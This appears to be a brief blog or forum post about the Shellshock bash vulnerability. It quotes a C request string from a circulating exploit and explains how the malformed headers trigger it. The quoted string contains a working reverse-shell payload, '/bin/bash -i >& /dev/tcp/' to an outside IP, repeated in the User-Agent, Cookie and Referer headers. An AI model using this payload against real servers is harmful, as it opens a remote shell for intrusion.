Google Web Cache of the exploit
char *request = “GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost: %s\r\nReferer: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\n\r\n”;
which as it is explained in the link (by the hacker) is to run a HTTP get malformed request. Malformed requests should not run, but due to the vulnerability they do.
the (){:;} triggers the vulnerability, he then runs a program on his system (on 199.175.52.92 port 2221) to run uname -a and create a log of the system’s characteristics.
Apparently a lot of computers are still not patched. Including a lot of Yahoo webservers as listed in this post.